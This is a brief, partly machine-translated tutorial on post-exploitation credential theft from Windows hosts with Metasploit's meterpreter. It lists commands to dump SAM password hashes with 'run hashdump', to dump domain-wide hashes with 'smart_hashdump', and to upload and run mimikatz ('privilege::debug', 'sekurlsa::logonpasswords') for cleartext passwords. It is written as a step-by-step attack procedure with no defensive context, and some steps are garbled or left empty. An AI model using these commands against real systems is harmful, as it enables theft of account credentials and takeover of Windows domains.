MSF grab password

MSF grab password

Export password hashes

1. run hashdump command
     The hashdump module can export local user accounts from the SAM database. The use of this command requires system permissions.
2. Execute the run hashdump command in meterpreter_shell

命令：
run hashdump

The output format of user hash data is:

用户名:SID:LM哈希:NTLM哈希:::

3. Run windows/gather/smart_hashdump command
  The use of run windows/gather/smart_hashdump command requires system permissions. This function is more powerful. If the current user is a domain administrator user, you can export the hashes of all users in the domain.

命令：run windows/gather/smart_hashdump

4. Use mimikatx to grab passwords:

1. Upload the mimikatz program:
     We can also obtain the clear text password by uploading the mimikatz program and then executing the mimikatz program
2. premise:

System permissions are required to execute mimikatz, and when executing, selection must be made based on the current system bit number.

3. Instructions:

Check the permissions of the current session in the command line of meterpreter_shell. You can see that the session system permissions are currently used.

4. Check the system digits and you can see that the current system digits are X64 bits:
   

5. Select x64-bit mimikatz to upload to the target server:
   Command:

upload file

6) Enter the interactive interface of mimikatz

execute -i -f mimikatz.exe

7) In the mimikatz interactive interface, use the following two commands to grab the password

privilege::debug
sekurlsa::logonpasswords